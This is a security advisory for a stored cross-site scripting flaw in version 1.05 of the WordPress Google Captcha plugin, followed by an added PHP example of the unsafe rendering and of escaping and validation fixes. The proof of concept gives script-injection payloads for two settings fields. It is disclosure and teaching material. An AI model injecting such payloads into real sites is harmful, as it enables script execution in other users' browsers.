WordPress Google Captcha 1.05 Cross Site Scripting

Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00


Plugin Name : Google Captcha (reCAPTCHA)  
Affected Version : 1.05 (and most probably lower versions, if any)  
Vulnerability : A3-Cross-Site Scripting (XSS)  
Identified by : Madhu Akula  
Technical Details  
Minimum Level of Access Required : Administrator  
PoC - (Proof of Concept) :  
Enter the payloads below in the following fields:  
gglcptch_public_key = “><script>alert(1)</script>  
gglcptch_private_key = “><script>alert(2)</script>  
Vulnerable Parameter : gglcptch_public_key, gglcptch_private_key  
Type of XSS : Stored  
Fixed in : 1.06  
Disclosure Timeline  
Vendor Contacted : 2014-08-04  
Plugin Status : Updated on 2014-08-07  
Public Disclosure : October 3, 2015  
CVE Number : Not assigned yet  
Plugin Description :  
The Google Captcha plugin allows you to implement a super security captcha form into web forms. Google Captcha is a free CAPTCHA service that helps to digitize books, newspapers and old time radio shows. This captcha can be used for login, registration, password recovery, comments forms.
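
Why a key field like gglcptch_public_key becomes stored XSS, and the two checks that stop it, as an added example: this is not the plugin's code (the advisory does not show it), the function names are hypothetical, and the key character set is an assumption.

```php
<?php
// Added illustration, not code from the Google Captcha plugin.
// All function names here are hypothetical.

// Vulnerable pattern: the stored setting is concatenated into the value=""
// attribute of the settings form, so a double quote in it ends the attribute.
function render_key_field_unsafe(string $name, string $stored): string {
    return '<input type="text" name="' . $name . '" value="' . $stored . '" />';
}

// Output escaping: quotes and angle brackets are encoded, so the browser
// treats the whole value as attribute text. In WordPress, esc_attr() is the
// function used for this context.
function render_key_field_safe(string $name, string $stored): string {
    $escaped = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $escaped . '" />';
}

// Input validation on save. Assumption: a key contains only letters, digits,
// "-" and "_". Anything else is discarded instead of being stored.
function sanitize_key_on_save(string $submitted): string {
    $trimmed = trim($submitted);
    return preg_match('/^[A-Za-z0-9_-]{1,128}$/', $trimmed) === 1 ? $trimmed : '';
}

// Constructed sample inputs: one modelled on the PoC fields above,
// one shaped like an ordinary key.
$poc_value = '"><script>alert(1)</script>';
$plain_key = '6LcConstructedSampleKey_-0123';

// The unsafe renderer lets the value leave the attribute; the safe one keeps
// it inside as inert text.
echo render_key_field_unsafe('gglcptch_public_key', $poc_value), PHP_EOL;
echo render_key_field_safe('gglcptch_public_key', $poc_value), PHP_EOL;

// Validation at save time: the markup-bearing value is dropped, the
// key-shaped value is kept unchanged.
var_dump(sanitize_key_on_save($poc_value));
var_dump(sanitize_key_on_save($plain_key));
```

Escaping at output is the fix for the rendering bug; validation on save keeps markup out of the options table so other code that reads the same option is not exposed.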